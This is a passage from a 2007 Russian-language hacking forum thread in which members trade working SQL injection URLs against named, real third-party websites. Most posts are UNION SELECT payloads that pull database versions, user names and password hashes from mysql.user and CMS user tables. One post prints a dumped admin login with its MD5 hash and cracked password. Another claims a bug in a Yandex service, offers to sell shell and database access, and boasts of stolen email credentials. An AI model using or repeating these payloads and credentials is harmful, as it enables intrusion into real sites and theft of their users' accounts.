ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1521  
Старый 01.04.2007, 11:05
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от n1†R0x  
Код:
http://www.foodforfun.ru/self.php?id=-1+union+select+1,2,3/*
ы.. пусто.
мдя, почему 1,2,3? )
http://www.foodforfun.ru/self.php?id=122+union+select+version(),2

Цитата:
Код:
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
выводка в title

мб кто дальше додумает
mr. nitrox, вы лентяй, там нечего думать ) внизу же написано что xoops.. da i newbb стоит..

http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+xoops_users+where+uid=1/*
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+xoops_users+where+uid=4/*
piggy{AZ}:edc52ca4fc24580fec8c11d6b7c5859e
piggy{AZ}:celebes

короч, чистый мд5 там.
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #1522  
Старый 01.04.2007, 14:11
Аватар для valiko
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.fish.bc.ca/news.php?news_id=-78+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
 
Ответить с цитированием

  #1523  
Старый 01.04.2007, 14:16
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://www.style2ouf.com/us/News/affiche_news.php?id_news=-1+union+select+concat(user,char(58),password),2,3,4,5,6,7+from+mysql.user/*
Код:
http://www.tamizdat.org/article.php?id=99999+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
 
Ответить с цитированием

  #1524  
Старый 01.04.2007, 14:26
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.vtb.no/vis.php?id=-3217+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(password,0x3a,user),0x71),0x71),4,5,6,7,8,9,10,11+from+mysql.user+limit+5,1/*
Код:
http://www.rushprint.no/artikkel.php?id=-889+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/*
Код:
http://www.trondelag-teater.no/forestilling.php?id=-842+union+select+1,version()/*

Последний раз редактировалось XTErner; 01.04.2007 в 14:28..
 
Ответить с цитированием

  #1525  
Старый 01.04.2007, 15:46
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

яндек с.ру

показываю только багу, кому интересно - добивайте дальше.
http://tv.yandex.ru/broadcast.xml?id=8043801-1 выдает тоже самое что и
http://tv.yandex.ru/broadcast.xml?id=8043800
описывать дальнейшие действия как использовать скулю не буду, но кто желает купить шелл - в приват. есть доступ к бд, в общем все блага. ДОРОГО!
кому интересно, выцепил из БД пару сотен мыльников с пассами вида pass:login:s_question:s_answer

http://c411k.jino-net.ru/upload/yand.php
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #1526  
Старый 01.04.2007, 16:41
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Там стоит IPB, префикс таблиц ibf_ , но запрос с "from" не проходит =\

Цитата:
http://www.gta.com.ua/file_details.phtml?id=-204+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20/*
С этим ХЗ как бороться...

Цитата:
http://www.mirposterov.ru/poster.asp?id=228'
http://www.mirposterov.ru/poster.asp?id=-228+order+by+1

Последний раз редактировалось Fr-Ron; 01.04.2007 в 19:44..
 
Ответить с цитированием

  #1527  
Старый 01.04.2007, 16:53
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://medichelp.ru/?category=394&page=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
Код:
http://www.dengi-info.com/news/?nid=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char)/*
Код:
http://www.salespb.ru/rubr.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #1528  
Старый 01.04.2007, 18:48
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://www.gamersinfo.net/content/news.php?id=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9+from+user+limit+0,1/*
Код:
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-1+union+select+concat(pass,char(58),uname),2,3,4,5+from+users/*
 
Ответить с цитированием

  #1529  
Старый 01.04.2007, 18:51
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.shopwell.ru/catalogue/tualet-cabine/?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15/*
Код:
http://www.553333.ru/towar.phtml?id_towar=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
 
Ответить с цитированием

  #1530  
Старый 01.04.2007, 19:37
Аватар для valiko
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.outside-music.ca/news.php?id=-38+union+select+1,2,3,4,user(),version(),7,database(),9,10,11,12,13/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ